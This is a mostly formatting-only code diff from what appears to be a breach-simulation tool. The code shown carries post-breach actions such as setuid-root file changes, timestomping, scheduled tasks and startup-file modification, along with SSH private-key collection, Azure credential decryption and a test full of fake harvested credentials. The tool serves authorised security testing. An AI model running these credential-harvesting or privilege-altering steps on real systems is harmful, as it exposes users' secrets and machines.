configuration.
:param host: VictimHost structure
:param only_one_port: Currently unused.
:return: T/F if there is at least one open port.

View File

@ -5,35 +5,35 @@ from infection_monkey.network.postgresql_finger import PostgreSQLFinger
IRRELEVANT_EXCEPTION_STRING = "This is an irrelevant exception string."
_RELEVANT_EXCEPTION_STRING_PARTS = {
"pwd_auth_failed": 'FATAL: password authentication failed for user "root"',
"ssl_on_entry_not_found": 'FATAL: no pg_hba.conf entry for host "127.0.0.1",'
"pwd_auth_failed":'FATAL: password authentication failed for user "root"',
"ssl_on_entry_not_found":'FATAL: no pg_hba.conf entry for host "127.0.0.1",'
'user "random", database "postgres", SSL on',
"ssl_off_entry_not_found": 'FATAL: no pg_hba.conf entry for host "127.0.0.1",'
"ssl_off_entry_not_found":'FATAL: no pg_hba.conf entry for host "127.0.0.1",'
'user "random", database "postgres", SSL off',
}
_RELEVANT_EXCEPTION_STRINGS = {
"pwd_auth_failed": _RELEVANT_EXCEPTION_STRING_PARTS["pwd_auth_failed"],
"ssl_off_entry_not_found": _RELEVANT_EXCEPTION_STRING_PARTS["ssl_off_entry_not_found"],
"pwd_auth_failed_pwd_auth_failed": "\n".join(
"pwd_auth_failed":_RELEVANT_EXCEPTION_STRING_PARTS["pwd_auth_failed"],
"ssl_off_entry_not_found":_RELEVANT_EXCEPTION_STRING_PARTS["ssl_off_entry_not_found"],
"pwd_auth_failed_pwd_auth_failed":"\n".join(
[
_RELEVANT_EXCEPTION_STRING_PARTS["pwd_auth_failed"],
_RELEVANT_EXCEPTION_STRING_PARTS["pwd_auth_failed"],
]
),
"pwd_auth_failed_ssl_off_entry_not_found": "\n".join(
"pwd_auth_failed_ssl_off_entry_not_found":"\n".join(
[
_RELEVANT_EXCEPTION_STRING_PARTS["pwd_auth_failed"],
_RELEVANT_EXCEPTION_STRING_PARTS["ssl_off_entry_not_found"],
]
),
"ssl_on_entry_not_found_pwd_auth_failed": "\n".join(
"ssl_on_entry_not_found_pwd_auth_failed":"\n".join(
[
_RELEVANT_EXCEPTION_STRING_PARTS["ssl_on_entry_not_found"],
_RELEVANT_EXCEPTION_STRING_PARTS["pwd_auth_failed"],
]
),
"ssl_on_entry_not_found_ssl_off_entry_not_found": "\n".join(
"ssl_on_entry_not_found_ssl_off_entry_not_found":"\n".join(
[
_RELEVANT_EXCEPTION_STRING_PARTS["ssl_on_entry_not_found"],
_RELEVANT_EXCEPTION_STRING_PARTS["ssl_off_entry_not_found"],
@ -42,48 +42,48 @@ _RELEVANT_EXCEPTION_STRINGS = {
}
_RESULT_STRINGS = {
"ssl_conf": "SSL is configured on the PostgreSQL server.\n",
"ssl_not_conf": "SSL is NOT configured on the PostgreSQL server.\n",
"all_ssl": "SSL connections can be made by all.\n",
"all_non_ssl": "Non-SSL connections can be made by all.\n",
"selected_ssl": "SSL connections can be made by selected hosts only OR "
"ssl_conf":"SSL is configured on the PostgreSQL server.\n",
"ssl_not_conf":"SSL is NOT configured on the PostgreSQL server.\n",
"all_ssl":"SSL connections can be made by all.\n",
"all_non_ssl":"Non-SSL connections can be made by all.\n",
"selected_ssl":"SSL connections can be made by selected hosts only OR "
"non-SSL usage is forced.\n",
"selected_non_ssl": "Non-SSL connections can be made by selected hosts only OR "
"selected_non_ssl":"Non-SSL connections can be made by selected hosts only OR "
"SSL usage is forced.\n",
"only_selected": "Only selected hosts can make connections (SSL or non-SSL).\n",
"only_selected":"Only selected hosts can make connections (SSL or non-SSL).\n",
}
RELEVANT_EXCEPTIONS_WITH_EXPECTED_RESULTS = {
# SSL not configured, all non-SSL allowed
_RELEVANT_EXCEPTION_STRINGS["pwd_auth_failed"]: [
_RELEVANT_EXCEPTION_STRINGS["pwd_auth_failed"]:[
_RESULT_STRINGS["ssl_not_conf"],
_RESULT_STRINGS["all_non_ssl"],
],
# SSL not configured, selected non-SSL allowed
_RELEVANT_EXCEPTION_STRINGS["ssl_off_entry_not_found"]: [
_RELEVANT_EXCEPTION_STRINGS["ssl_off_entry_not_found"]:[
_RESULT_STRINGS["ssl_not_conf"],
_RESULT_STRINGS["selected_non_ssl"],
],
# all SSL allowed, all non-SSL allowed
_RELEVANT_EXCEPTION_STRINGS["pwd_auth_failed_pwd_auth_failed"]: [
_RELEVANT_EXCEPTION_STRINGS["pwd_auth_failed_pwd_auth_failed"]:[
_RESULT_STRINGS["ssl_conf"],
_RESULT_STRINGS["all_ssl"],
_RESULT_STRINGS["all_non_ssl"],
],
# all SSL allowed, selected non-SSL allowed
_RELEVANT_EXCEPTION_STRINGS["pwd_auth_failed_ssl_off_entry_not_found"]: [
_RELEVANT_EXCEPTION_STRINGS["pwd_auth_failed_ssl_off_entry_not_found"]:[
_RESULT_STRINGS["ssl_conf"],
_RESULT_STRINGS["all_ssl"],
_RESULT_STRINGS["selected_non_ssl"],
],
# selected SSL allowed, all non-SSL allowed
_RELEVANT_EXCEPTION_STRINGS["ssl_on_entry_not_found_pwd_auth_failed"]: [
_RELEVANT_EXCEPTION_STRINGS["ssl_on_entry_not_found_pwd_auth_failed"]:[
_RESULT_STRINGS["ssl_conf"],
_RESULT_STRINGS["selected_ssl"],
_RESULT_STRINGS["all_non_ssl"],
],
# selected SSL allowed, selected non-SSL allowed
_RELEVANT_EXCEPTION_STRINGS["ssl_on_entry_not_found_ssl_off_entry_not_found"]: [
_RELEVANT_EXCEPTION_STRINGS["ssl_on_entry_not_found_ssl_off_entry_not_found"]:[
_RESULT_STRINGS["ssl_conf"],
_RESULT_STRINGS["only_selected"],
],

View File

@ -129,7 +129,8 @@ def check_tcp_ports(ip, ports, timeout=DEFAULT_TIMEOUT, get_banner=False):
possible_ports.append((port, sock))
continue
if err == 10035: # WSAEWOULDBLOCK is valid, see
# https://msdn.microsoft.com/en-us/library/windows/desktop/ms740668%28v=vs.85%29.aspx?f=255&MSPPError=-2147217396
# https://msdn.microsoft.com/en-us/library/windows/desktop/ms740668%28v=vs.85%29
# .aspx?f=255&MSPPError=-2147217396
possible_ports.append((port, sock))
continue
if err == 115: # EINPROGRESS 115 /* Operation now in progress */
@ -164,7 +165,8 @@ def check_tcp_ports(ip, ports, timeout=DEFAULT_TIMEOUT, get_banner=False):
readable_sockets, _, _ = select.select(
[s[1] for s in connected_ports_sockets], [], [], 0
)
# read first BANNER_READ bytes. We ignore errors because service might not send a decodable byte string.
# read first BANNER_READ bytes. We ignore errors because service might not send a
# decodable byte string.
banners = [
sock.recv(BANNER_READ).decode(errors="ignore")
if sock in readable_sockets
@ -209,7 +211,8 @@ def _get_traceroute_bin_path():
Its been built using the buildroot utility with the following settings:
* Statically link to musl and all other required libs
* Optimize for size
This is done because not all linux distros come with traceroute out-of-the-box, and to ensure it behaves as expected
This is done because not all linux distros come with traceroute out-of-the-box, and to ensure
it behaves as expected
:return: Path to traceroute executable
"""
@ -223,7 +226,8 @@ def _parse_traceroute(output, regex, ttl):
:param regex: Regex for finding an IP address
:param ttl: Max TTL. Must be the same as the TTL used as param for traceroute.
:return: List of ips which are the hops on the way to the traceroute destination.
If a hop's IP wasn't found by traceroute, instead of an IP, the array will contain None
If a hop's IP wasn't found by traceroute, instead of an IP, the array will
contain None
"""
ip_lines = output.split("\n")
trace_list = []

View File

@ -27,7 +27,8 @@ logger = logging.getLogger(__name__)
class CommunicateAsNewUser(PBA):
"""
This PBA creates a new user, and then creates HTTPS requests as that user. This is used for a Zero Trust test of the
This PBA creates a new user, and then creates HTTPS requests as that user. This is used for a
Zero Trust test of the
People pillar. See the relevant telemetry processing to see what findings are created.
"""
@ -58,7 +59,8 @@ class CommunicateAsNewUser(PBA):
def get_commandline_for_http_request(url, is_windows=is_windows_os()):
if is_windows:
format_string = (
'powershell.exe -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; '
'powershell.exe -command "[Net.ServicePointManager]::SecurityProtocol = ['
"Net.SecurityProtocolType]::Tls12; "
'Invoke-WebRequest {url} -UseBasicParsing"'
)
else:
@ -79,7 +81,8 @@ class CommunicateAsNewUser(PBA):
"""
if exit_status == 0:
PostBreachTelem(
self, (CREATED_PROCESS_AS_USER_SUCCESS_FORMAT.format(commandline, username), True)
self,
(CREATED_PROCESS_AS_USER_SUCCESS_FORMAT.format(commandline, username), True)
).send()
else:
PostBreachTelem(

View File

@ -9,5 +9,6 @@ class AccountDiscovery(PBA):
def __init__(self):
linux_cmds, windows_cmds = get_commands_to_discover_accounts()
super().__init__(
POST_BREACH_ACCOUNT_DISCOVERY, linux_cmd=" ".join(linux_cmds), windows_cmd=windows_cmds
POST_BREACH_ACCOUNT_DISCOVERY, linux_cmd=" ".join(linux_cmds),
windows_cmd=windows_cmds
)

View File

@ -28,7 +28,8 @@ class SignedScriptProxyExecution(PBA):
super().run()
except Exception as e:
LOG.warning(
f"An exception occurred on running PBA {POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC}: {str(e)}"
f"An exception occurred on running PBA "
f"{POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC}: {str(e)}"
)
finally:
cleanup_changes(original_comspec)

View File

@ -1,7 +1,9 @@
SCHEDULED_TASK_NAME = "monkey-spawn-cmd"
SCHEDULED_TASK_COMMAND = r"C:\windows\system32\cmd.exe"
# Commands from: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
# Commands from: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005
# /T1053.005.md
def get_windows_commands_to_schedule_jobs():

View File

@ -16,7 +16,8 @@ __author__ = "VakarisZ"
class PBA(Plugin):
"""
Post breach action object. Can be extended to support more than command execution on target machine.
Post breach action object. Can be extended to support more than command execution on target
machine.
"""
@staticmethod
@ -61,7 +62,8 @@ class PBA(Plugin):
result = exec_funct()
if self.scripts_were_used_successfully(result):
T1064Telem(
ScanStatus.USED, f"Scripts were used to execute {self.name} post breach action."
ScanStatus.USED,
f"Scripts were used to execute {self.name} post breach action."
).send()
PostBreachTelem(self, result).send()
else:

View File

@ -1,11 +1,14 @@
TEMP_FILE = "$HOME/monkey-temp-file"
# Commands from https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md
# Commands from https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001
# /T1548.001.md
def get_linux_commands_to_setuid_setgid():
return [
f"touch {TEMP_FILE} && chown root {TEMP_FILE} && chmod u+s {TEMP_FILE} && chmod g+s {TEMP_FILE} &&",
f"touch {TEMP_FILE} && chown root {TEMP_FILE} && chmod u+s {TEMP_FILE} && chmod g+s "
f"{TEMP_FILE} &&",
'echo "Successfully changed setuid/setgid bits" &&',
f"rm {TEMP_FILE}",
]

View File

@ -1,7 +1,9 @@
from infection_monkey.post_breach.shell_startup_files.linux.shell_startup_files_modification import (
from infection_monkey.post_breach.shell_startup_files.linux.shell_startup_files_modification\
import (
get_linux_commands_to_modify_shell_startup_files,
)
from infection_monkey.post_breach.shell_startup_files.windows.shell_startup_files_modification import (
from infection_monkey.post_breach.shell_startup_files.windows.shell_startup_files_modification\
import (
get_windows_commands_to_modify_shell_startup_files,
)

View File

@ -19,13 +19,15 @@ def get_windows_commands_to_modify_shell_startup_files():
STARTUP_FILES_PER_USER = [
"\\".join(
SHELL_STARTUP_FILE_PATH_COMPONENTS[:2] + [user] + SHELL_STARTUP_FILE_PATH_COMPONENTS[3:]
SHELL_STARTUP_FILE_PATH_COMPONENTS[:2] + [
user] + SHELL_STARTUP_FILE_PATH_COMPONENTS[3:]
)
for user in USERS
]
return [
"powershell.exe",
"infection_monkey/post_breach/shell_startup_files/windows/modify_powershell_startup_file.ps1",
"infection_monkey/post_breach/shell_startup_files/windows"
"/modify_powershell_startup_file.ps1",
"-startup_file_path {0}",
], STARTUP_FILES_PER_USER

View File

@ -13,7 +13,7 @@ CUSTOM_WINDOWS_FILENAME = "filename-for-windows"
def fake_monkey_dir_path(monkeypatch):
monkeypatch.setattr(
"infection_monkey.post_breach.actions.users_custom_pba.get_monkey_dir_path",
lambda: MONKEY_DIR_PATH,
lambda:MONKEY_DIR_PATH,
)
@ -21,7 +21,7 @@ def fake_monkey_dir_path(monkeypatch):
def set_os_linux(monkeypatch):
monkeypatch.setattr(
"infection_monkey.post_breach.actions.users_custom_pba.is_windows_os",
lambda: False,
lambda:False,
)
@ -29,7 +29,7 @@ def set_os_linux(monkeypatch):
def set_os_windows(monkeypatch):
monkeypatch.setattr(
"infection_monkey.post_breach.actions.users_custom_pba.is_windows_os",
lambda: True,
lambda:True,
)
@ -75,7 +75,6 @@ def test_command_windows_custom_file_and_cmd(
@pytest.fixture
def mock_UsersPBA_linux_custom_file(set_os_linux, fake_monkey_dir_path, monkeypatch):
monkeypatch.setattr("infection_monkey.config.WormConfiguration.custom_PBA_linux_cmd", None)
monkeypatch.setattr(
"infection_monkey.config.WormConfiguration.PBA_linux_filename",
@ -91,7 +90,6 @@ def test_command_linux_custom_file(mock_UsersPBA_linux_custom_file):
@pytest.fixture
def mock_UsersPBA_windows_custom_file(set_os_windows, fake_monkey_dir_path, monkeypatch):
monkeypatch.setattr("infection_monkey.config.WormConfiguration.custom_PBA_windows_cmd", None)
monkeypatch.setattr(
"infection_monkey.config.WormConfiguration.PBA_windows_filename",
@ -107,7 +105,6 @@ def test_command_windows_custom_file(mock_UsersPBA_windows_custom_file):
@pytest.fixture
def mock_UsersPBA_linux_custom_cmd(set_os_linux, fake_monkey_dir_path, monkeypatch):
monkeypatch.setattr(
"infection_monkey.config.WormConfiguration.custom_PBA_linux_cmd",
CUSTOM_LINUX_CMD,
@ -123,7 +120,6 @@ def test_command_linux_custom_cmd(mock_UsersPBA_linux_custom_cmd):
@pytest.fixture
def mock_UsersPBA_windows_custom_cmd(set_os_windows, fake_monkey_dir_path, monkeypatch):
monkeypatch.setattr(
"infection_monkey.config.WormConfiguration.custom_PBA_windows_cmd",
CUSTOM_WINDOWS_CMD,

View File

@ -10,5 +10,5 @@ def get_linux_timestomping_commands():
f"rm {TEMP_FILE} -f"
]
# Commands' source: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md
# Commands' source: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006
# /T1070.006.md

View File

@ -4,5 +4,5 @@ TEMP_FILE = "monkey-timestomping-file.txt"
def get_windows_timestomping_commands():
return "powershell.exe infection_monkey/post_breach/timestomping/windows/timestomping.ps1"
# Commands' source: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md
# Commands' source: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006
# /T1070.006.md

View File

@ -1,5 +1,6 @@
def get_linux_trap_commands():
return [
"trap 'echo \"Successfully used trap command\"' INT && kill -2 $$ ;", # trap and send SIGINT signal
"trap 'echo \"Successfully used trap command\"' INT && kill -2 $$ ;",
# trap and send SIGINT signal
"trap - INT", # untrap SIGINT
]

View File

@ -6,7 +6,8 @@ __author__ = "itay.mizeretz"
def get_binaries_dir_path():
"""
Gets the path to the binaries dir (files packaged in pyinstaller if it was used, infection_monkey dir otherwise)
Gets the path to the binaries dir (files packaged in pyinstaller if it was used,
infection_monkey dir otherwise)
:return: Binaries dir path
"""
if getattr(sys, "frozen", False):

View File

@ -38,11 +38,11 @@ class SSHCollector(object):
possibly hashed)
"""
return {
"name": name,
"home_dir": home_dir,
"public_key": None,
"private_key": None,
"known_hosts": None,
"name":name,
"home_dir":home_dir,
"public_key":None,
"private_key":None,
"known_hosts":None,
}
@staticmethod
@ -72,7 +72,8 @@ class SSHCollector(object):
try:
with open(public) as f:
info["public_key"] = f.read()
# By default private key has the same name as public, only without .pub
# By default private key has the same name as public,
# only without .pub
private = os.path.splitext(public)[0]
if os.path.exists(private):
try:
@ -83,7 +84,8 @@ class SSHCollector(object):
info["private_key"] = private_key
LOG.info("Found private key in %s" % private)
T1005Telem(
ScanStatus.USED, "SSH key", "Path: %s" % private
ScanStatus.USED, "SSH key",
"Path: %s" % private
).send()
else:
continue

View File

@ -29,7 +29,8 @@ class OperatingSystem(IntEnum):
class SystemInfoCollector(object):
"""
A class that checks the current operating system and calls system information collecting modules accordingly
A class that checks the current operating system and calls system information collecting
modules accordingly
"""
def __init__(self):
@ -79,8 +80,8 @@ class InfoCollector(object):
"""
LOG.debug("Reading subnets")
self.info["network_info"] = {
"networks": get_host_subnets(),
"netstat": NetstatCollector.get_netstat_info(),
"networks":get_host_subnets(),
"netstat":NetstatCollector.get_netstat_info(),
}
def get_azure_info(self):
@ -113,5 +114,6 @@ class InfoCollector(object):
self.info["Azure"] = {}
self.info["Azure"]["usernames"] = [cred[0] for cred in azure_creds]
except Exception:
# If we failed to collect azure info, no reason to fail all the collection. Log and continue.
# If we failed to collect azure info, no reason to fail all the collection. Log and
# continue.
LOG.error("Failed collecting Azure info.", exc_info=True)

View File

@ -97,7 +97,8 @@ class AzureCollector(object):
# we're going to do as much of this in PS as we can.
ps_block = ";\n".join(
[
'[System.Reflection.Assembly]::LoadWithPartialName("System.Security") | Out-Null',
'[System.Reflection.Assembly]::LoadWithPartialName("System.Security") | '
"Out-Null",
'$base64 = "%s"' % protected_data,
"$content = [Convert]::FromBase64String($base64)",
"$env = New-Object Security.Cryptography.Pkcs.EnvelopedCms",

View File

@ -31,7 +31,7 @@ class AwsCollector(SystemInfoCollector):
info = {}
if aws.is_instance():
logger.info("Machine is an AWS instance")
info = {"instance_id": aws.get_instance_id()}
info = {"instance_id":aws.get_instance_id()}
else:
logger.info("Machine is NOT an AWS instance")

View File

@ -21,4 +21,4 @@ class EnvironmentCollector(SystemInfoCollector):
super().__init__(name=ENVIRONMENT_COLLECTOR)
def collect(self) -> dict:
return {"environment": get_monkey_environment()}
return {"environment":get_monkey_environment()}

View File

@ -12,4 +12,4 @@ class HostnameCollector(SystemInfoCollector):
super().__init__(name=HOSTNAME_COLLECTOR)
def collect(self) -> dict:
return {"hostname": socket.getfqdn()}
return {"hostname":socket.getfqdn()}

View File

@ -30,22 +30,23 @@ class ProcessListCollector(SystemInfoCollector):
for process in psutil.process_iter():
try:
processes[process.pid] = {
"name": process.name(),
"pid": process.pid,
"ppid": process.ppid(),
"cmdline": " ".join(process.cmdline()),
"full_image_path": process.exe(),
"name":process.name(),
"pid":process.pid,
"ppid":process.ppid(),
"cmdline":" ".join(process.cmdline()),
"full_image_path":process.exe(),
}
except (psutil.AccessDenied, WindowsError):
# we may be running as non root and some processes are impossible to acquire in Windows/Linux.
# we may be running as non root and some processes are impossible to acquire in
# Windows/Linux.
# In this case we'll just add what we know.
processes[process.pid] = {
"name": "null",
"pid": process.pid,
"ppid": process.ppid(),
"cmdline": "ACCESS DENIED",
"full_image_path": "null",
"name":"null",
"pid":process.pid,
"ppid":process.ppid(),
"cmdline":"ACCESS DENIED",
"full_image_path":"null",
}
continue
return {"process_list": processes}
return {"process_list":processes}

View File

@ -1,4 +1,5 @@
# Inspired by Giampaolo Rodola's psutil example from https://github.com/giampaolo/psutil/blob/master/scripts/netstat.py
# Inspired by Giampaolo Rodola's psutil example from
# https://github.com/giampaolo/psutil/blob/master/scripts/netstat.py
import logging
import socket
@ -19,10 +20,10 @@ class NetstatCollector(object):
AF_INET6 = getattr(socket, "AF_INET6", object())
proto_map = {
(AF_INET, SOCK_STREAM): "tcp",
(AF_INET6, SOCK_STREAM): "tcp6",
(AF_INET, SOCK_DGRAM): "udp",
(AF_INET6, SOCK_DGRAM): "udp6",
(AF_INET, SOCK_STREAM):"tcp",
(AF_INET6, SOCK_STREAM):"tcp6",
(AF_INET, SOCK_DGRAM):"udp",
(AF_INET6, SOCK_DGRAM):"udp6",
}
@staticmethod
@ -33,11 +34,11 @@ class NetstatCollector(object):
@staticmethod
def _parse_connection(c):
return {
"proto": NetstatCollector.proto_map[(c.family, c.type)],
"local_address": c.laddr[0],
"local_port": c.laddr[1],
"remote_address": c.raddr[0] if c.raddr else None,
"remote_port": c.raddr[1] if c.raddr else None,
"status": c.status,
"pid": c.pid,
"proto":NetstatCollector.proto_map[(c.family, c.type)],
"local_address":c.laddr[0],
"local_port":c.laddr[1],
"remote_address":c.raddr[0] if c.raddr else None,
"remote_port":c.raddr[1] if c.raddr else None,
"status":c.status,
"pid":c.pid,
}

View File

@ -7,9 +7,12 @@ from infection_monkey.utils.plugins.plugin import Plugin
class SystemInfoCollector(Plugin, metaclass=ABCMeta):
"""
ABC for system info collection. See system_info_collector_handler for more info. Basically, to implement a new system info
collector, inherit from this class in an implementation in the infection_monkey.system_info.collectors class, and override
the 'collect' method. Don't forget to parse your results in the Monkey Island and to add the collector to the configuration
ABC for system info collection. See system_info_collector_handler for more info. Basically,
to implement a new system info
collector, inherit from this class in an implementation in the
infection_monkey.system_info.collectors class, and override
the 'collect' method. Don't forget to parse your results in the Monkey Island and to add the
collector to the configuration
as well - see monkey_island.cc.services.processing.system_info_collectors for examples.
See the Wiki page "How to add a new System Info Collector to the Monkey?" for a detailed guide.

View File

@ -24,12 +24,11 @@ class SystemInfoCollectorsHandler(object):
# If we failed one collector, no need to stop execution. Log and continue.
LOG.error("Collector {} failed. Error info: {}".format(collector.name, e))
LOG.info(
"All system info collectors executed. Total {} executed, out of which {} collected successfully.".format(
len(self.collectors_list), successful_collections
)
"All system info collectors executed. Total {} executed, out of which {} "
"collected successfully.".format(len(self.collectors_list), successful_collections)
)
SystemInfoTelem({"collectors": system_info_telemetry}).send()
SystemInfoTelem({"collectors":system_info_telemetry}).send()
@staticmethod
def config_to_collectors_list() -> Sequence[SystemInfoCollector]:

View File

@ -22,5 +22,5 @@ class MimikatzCredentialCollector(object):
# Lets not use "." and "$" in keys, because it will confuse mongo.
# Ideally we should refactor island not to use a dict and simply parse credential list.
key = cred.username.replace(".", ",").replace("$", "")
cred_dict.update({key: cred.to_dict()})
cred_dict.update({key:cred.to_dict()})
return cred_dict

View File

@ -8,119 +8,123 @@ from infection_monkey.system_info.windows_cred_collector.pypykatz_handler import
class TestPypykatzHandler(TestCase):
# Made up credentials, but structure of dict should be roughly the same
PYPYKATZ_SESSION = {
"authentication_id": 555555,
"session_id": 3,
"username": "Monkey",
"domainname": "ReAlDoMaIn",
"logon_server": "ReAlDoMaIn",
"logon_time": "2020-06-02T04:53:45.256562+00:00",
"sid": "S-1-6-25-260123139-3611579848-5589493929-3021",
"luid": 123086,
"msv_creds": [
"authentication_id":555555,
"session_id":3,
"username":"Monkey",
"domainname":"ReAlDoMaIn",
"logon_server":"ReAlDoMaIn",
"logon_time":"2020-06-02T04:53:45.256562+00:00",
"sid":"S-1-6-25-260123139-3611579848-5589493929-3021",
"luid":123086,
"msv_creds":[
{
"username": "monkey",
"domainname": "ReAlDoMaIn",
"NThash": b"1\xb7<Y\xd7\xe0\xc0\x89\xc01\xd6\xcf\xe0\xd1j\xe9",
"LMHash": None,
"SHAHash": b"\x18\x90\xaf\xd8\x07\t\xda9\xa3\xee^kK\r2U\xbf\xef\x95`",
"username":"monkey",
"domainname":"ReAlDoMaIn",
"NThash":b"1\xb7<Y\xd7\xe0\xc0\x89\xc01\xd6\xcf\xe0\xd1j\xe9",
"LMHash":None,
"SHAHash":b"\x18\x90\xaf\xd8\x07\t\xda9\xa3\xee^kK\r2U\xbf\xef\x95`",
}
],
"wdigest_creds": [
"wdigest_creds":[
{
"credtype": "wdigest",
"username": "monkey",
"domainname": "ReAlDoMaIn",
"password": "canyoufindme",
"luid": 123086,
"credtype":"wdigest",
"username":"monkey",
"domainname":"ReAlDoMaIn",
"password":"canyoufindme",
"luid":123086,
}
],
"ssp_creds": [
"ssp_creds":[
{
"credtype": "wdigest",
"username": "monkey123",
"domainname": "ReAlDoMaIn",
"password": "canyoufindme123",
"luid": 123086,
"credtype":"wdigest",
"username":"monkey123",
"domainname":"ReAlDoMaIn",
"password":"canyoufindme123",
"luid":123086,
}
],
"livessp_creds": [
"livessp_creds":[
{
"credtype": "wdigest",
"username": "monk3y",
"domainname": "ReAlDoMaIn",
"password": "canyoufindm3",
"luid": 123086,
"credtype":"wdigest",
"username":"monk3y",
"domainname":"ReAlDoMaIn",
"password":"canyoufindm3",
"luid":123086,
}
],
"dpapi_creds": [
"dpapi_creds":[
{
"credtype": "dpapi",
"key_guid": "9123-123ae123de4-121239-3123-421f",
"masterkey": "6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"credtype":"dpapi",
"key_guid":"9123-123ae123de4-121239-3123-421f",
"masterkey":
"6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"f051e891c30e6e9af6db54500fedfed1c968389bf6262c77fbaa68c9",
"sha1_masterkey": "bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da",
"luid": 123086,
"sha1_masterkey":"bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da",
"luid":123086,
},
{
"credtype": "dpapi",
"key_guid": "9123-123ae123de4-121239-3123-421f",
"masterkey": "6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"credtype":"dpapi",
"key_guid":"9123-123ae123de4-121239-3123-421f",
"masterkey":
"6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"f051e891c30e6e9af6db54500fedfed1c968389bf6262c77fbaa68c9",
"sha1_masterkey": "bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da",
"luid": 123086,
"sha1_masterkey":"bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da",
"luid":123086,
},
{
"credtype": "dpapi",
"key_guid": "9123-123ae123de4-121239-3123-421f",
"masterkey": "6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"credtype":"dpapi",
"key_guid":"9123-123ae123de4-121239-3123-421f",
"masterkey":
"6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"f051e891c30e6e9af6db54500fedfed1c968389bf6262c77fbaa68c9",
"sha1_masterkey": "bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da",
"luid": 123086,
"sha1_masterkey":"bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da",
"luid":123086,
},
{
"credtype": "dpapi",
"key_guid": "9123-123ae123de4-121239-3123-421f",
"masterkey": "6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"credtype":"dpapi",
"key_guid":"9123-123ae123de4-121239-3123-421f",
"masterkey":
"6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"f051e891c30e6e9af6db54500fedfed1c968389bf6262c77fbaa68c9",
"sha1_masterkey": "bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da",
"luid": 123086,
"sha1_masterkey":"bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da",
"luid":123086,
},
{"credtype": "dpapi", "key_guid": "9123-123ae123de4-121239-3123-421f"},
{"credtype":"dpapi", "key_guid":"9123-123ae123de4-121239-3123-421f"},
],
"kerberos_creds": [
"kerberos_creds":[
{
"credtype": "kerberos",
"username": "monkey_kerb",
"password": None,
"domainname": "ReAlDoMaIn",
"luid": 123086,
"tickets": [],
"credtype":"kerberos",
"username":"monkey_kerb",
"password":None,
"domainname":"ReAlDoMaIn",
"luid":123086,
"tickets":[],
}
],
"credman_creds": [
"credman_creds":[
{
"credtype": "credman",
"username": "monkey",
"domainname": "monkey.ad.monkey.com",
"password": "canyoufindme2",
"luid": 123086,
"credtype":"credman",
"username":"monkey",
"domainname":"monkey.ad.monkey.com",
"password":"canyoufindme2",
"luid":123086,
},
{
"credtype": "credman",
"username": "monkey@monkey.com",
"domainname": "moneky.monkey.com",
"password": "canyoufindme1",
"luid": 123086,
"credtype":"credman",
"username":"monkey@monkey.com",
"domainname":"moneky.monkey.com",
"password":"canyoufindme1",
"luid":123086,
},
{
"credtype": "credman",
"username": "test",
"domainname": "test.test.ts",
"password": "canyoufindit",
"luid": 123086,
"credtype":"credman",
"username":"test",
"domainname":"test.test.ts",
"password":"canyoufindit",
"luid":123086,
},
],
"tspkg_creds": [],
"tspkg_creds":[],
}
def test__get_creds_from_pypykatz_session(self):
@ -128,27 +132,27 @@ class TestPypykatzHandler(TestCase):
test_dicts = [
{
"username": "monkey",
"ntlm_hash": "31b73c59d7e0c089c031d6cfe0d16ae9",
"password": "",
"lm_hash": "",
"username":"monkey",
"ntlm_hash":"31b73c59d7e0c089c031d6cfe0d16ae9",
"password":"",
"lm_hash":"",
},
{"username": "monkey", "ntlm_hash": "", "password": "canyoufindme", "lm_hash": ""},
{"username":"monkey", "ntlm_hash":"", "password":"canyoufindme", "lm_hash":""},
{
"username": "monkey123",
"ntlm_hash": "",
"password": "canyoufindme123",
"lm_hash": "",
"username":"monkey123",
"ntlm_hash":"",
"password":"canyoufindme123",
"lm_hash":"",
},
{"username": "monk3y", "ntlm_hash": "", "password": "canyoufindm3", "lm_hash": ""},
{"username": "monkey", "ntlm_hash": "", "password": "canyoufindme2", "lm_hash": ""},
{"username":"monk3y", "ntlm_hash":"", "password":"canyoufindm3", "lm_hash":""},
{"username":"monkey", "ntlm_hash":"", "password":"canyoufindme2", "lm_hash":""},
{
"username": "monkey@monkey.com",
"ntlm_hash": "",
"password": "canyoufindme1",
"lm_hash": "",
"username":"monkey@monkey.com",
"ntlm_hash":"",
"password":"canyoufindme1",
"lm_hash":"",
},
{"username": "test", "ntlm_hash": "", "password": "canyoufindit", "lm_hash": ""},
{"username":"test", "ntlm_hash":"", "password":"canyoufindit", "lm_hash":""},
]
results = [result.to_dict() for result in results]
[self.assertTrue(test_dict in results) for test_dict in test_dicts]

View File

